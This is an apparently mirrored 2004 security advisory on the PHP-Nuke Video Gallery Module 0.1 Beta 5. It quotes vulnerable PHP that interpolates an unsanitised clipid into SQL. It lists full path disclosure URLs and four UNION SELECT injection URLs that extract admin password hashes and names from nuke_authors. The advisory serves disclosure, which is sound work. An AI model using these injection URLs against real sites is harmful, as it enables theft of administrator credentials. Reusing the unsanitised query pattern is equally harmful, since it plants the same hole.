phpnukeVideo.txt

phpnukeVideo.txt: Posted Apr 28, 2004; Authored by DarkBicho | Site darkbicho.tk; PHP-Nuke Video Gallery Module version 0.1 Beta 5 is susceptible to full path disclosure and SQL injection attacks.; tags | exploit, php, sql injection; SHA-256 | fe3ff118560c7e9a4f76a80601322a0fa94b9f122ffbe84c9212355bc5ab8523; Download | Favorite | View

phpnukeVideo.txt

Adivore: http://bichosoft.webcindario.com/advisory-03.txt

===========================================================================
=================== Multiple vulnerabilities PHP-Nuke =====================
=================== Video Gallery Module for PHP-Nuke =====================

PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke
HOMEPAGE: http://videogallery.engorile.com/
VERSION: 0.1 Beta 5
BUG: Multiple vulnerabilities
DATE:  26/04/2004
AUTHOR: DarkBicho
   web: http://www.darkbicho.tk
   team: Security Wari Proyects <www.swp-zone.org>
   Email: darkbicho@peru.com

===========================================================================
===========================================================================


Vulnerabilities:
---------------

1.- CODE:
    ¨¨¨¨
================================ CODE ===================================
function render_detail_clip($clipid, $catid){
  global $prefix, $dbi, $module_name;
  $tipomime="application/unknown";
  $next=next_clips($clipid, $catid);
  $result=sql_query("select descripcion, url_thumb, url_preview, accesos from 
".$prefix."_videos_clips where clipid=$clipid", $dbi);
  list($descripcion, $url_thumb, $url_preview, 
$accesos)=sql_fetch_row($result, $dbi);
  $resultado=AbreTabla();
  if ($next["previous"]){
    $resultado.="<a 
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";
  }
  $resultado.="</td><td align=right>";
  if ($next["next"]){
    $resultado.="<a 
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";
  }
  $resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";
  if ($url_preview != ""){
    $tipomime=tipomime($clipid, "clips");
    $result2=sql_query("select class_id, options_object, options_embed from 
".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);
    list($class_id, $options_object, $options_embed)=sql_fetch_row($result2, 
$dbi);
    $resultado.="<center>".mete_video($url_preview, $tipomime, 160, 
120)."</center>";

  }
  else{
    $resultado.="<center><img src=\"$url_thumb\"></center>";
  }
  $resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);
  if (count_total($clipid, "clip", "ficheros") > 0){
    $resultado.=CierraTabla().AbreTabla().clip_files($clipid, 
$catid).CierraTabla();
  }
  else{
    $resultado.=CierraTabla();
  }
  $accesos++;
  sql_query("update ".$prefix."_videos_clips set accesos=$accesos where 
clipid=$clipid", $dbi);
  return "$resultado";
}

=========================================================================

2.- Full path disclosure:
    ¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive 
information.

    A) 
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho

       Warning: mysql_fetch_row(): supplied argument is not a valid MySQL 
result resource in                                    
/home/hosting/php-nuke/includes/sql_layer.php on line 286

    B) 
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

       Warning: mysql_fetch_row(): supplied argument is not a valid MySQL 
result resource in                                   
/home/hosting/php-nuke/includes/sql_layer.php on line 286



3.- Sql injection:
    ¨¨¨¨¨¨¨¨¨¨¨¨¨¨
    This sql injection exploit can pull out from database any information, 
for example
    superadmin's username and password's md5 hash:


    A) 
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

    B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

    c)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1

    D)
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1


SOLUTION:
¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
    Check the Video Gallery website for updates and official release 
details.

_________________________________________________________________
Charla con tus amigos en línea mediante MSN Messenger: 
http://messenger.latam.msn.com/

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

phpnukeVideo.txt

phpnukeVideo.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpnukeVideo.txt

Share This

phpnukeVideo.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems